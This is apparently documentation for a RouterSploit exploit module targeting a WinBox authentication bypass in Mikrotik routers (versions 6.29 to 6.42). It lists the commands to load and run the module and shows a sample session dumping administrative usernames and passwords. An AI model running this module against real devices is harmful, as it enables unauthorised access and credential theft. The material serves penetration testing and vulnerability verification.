## Description

Module bypass authentication through WinBox service in Mikrotik devices version from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) and retrieves administrative credentials.

## Verification Steps

  1. Start `./rsf.py`
  2. Do: `use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure`
  3. Do: `set target [TargetIP]`
  4. Do: `run`
  5. If device is vulnerable administrative credentials are returned.

## Scenarios

```
rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials

   Username     Password
   --------     --------
   user1        test
   admin        admin
   admin        admin

```